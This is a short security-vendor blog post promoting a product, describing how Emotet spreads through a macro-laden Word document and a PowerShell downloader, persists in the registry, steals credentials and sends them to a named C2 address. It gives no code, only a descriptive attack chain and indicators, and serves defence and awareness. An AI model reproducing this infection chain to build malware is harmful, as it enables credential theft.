The Cylance Threat Research Group is going head-to-head with a resurgent Emotet. This malware resurfaced in 2017 showcasing new capabilities and targeting sectors beyond the banking industry. Those familiar with the 2014 version will recall Emotet as a banking trojan that harvests data and steals account information.
Watch Cylance go head-to-head with Emotet here:
VIDEO: Our Threat Guidance Team Pits Cylance Against the Emotet Infostealer Malware
Focused primarily on financial institutions in Austria and Germany, early iterations of this malware infected systems via email attachments opened by unsuspecting users. Emotet now has new capabilities added to an already impressive toolkit:
- A new dropper using CreateTimeQueueTimer
- Sandbox awareness
- Anti-analysis capabilities
The Cylance Threat Guidance team analyzed an Emotet attack using a Microsoft Word Document containing a malicious macro. Opening the file prompts users to enable macros within the document which launches a PowerShell script that downloads and runs a version of Emotet.
Once running, Emotet (identified in our tests as certproc.exe) copies itself to “%AppData%\local\microsoft\windows\certproc.exe and embeds itself in the registry. Next, it scans the host system for PII, credentials, and other sensitive information. Collected information is sent to C2 over IP address 22.214.171.124.
Cylance Blocks Emotet
Our tests show that CylancePROTECT® script control blocks the malicious macro before it calls the PowerShell script. The re-tooled and resurgent Emotet malware poses new dangers to industries ranging from banking to healthcare – but CylancePROTECT customers have nothing to fear.
Read our Threat Guidance team's 'deep dive' technical write up on Emotet here.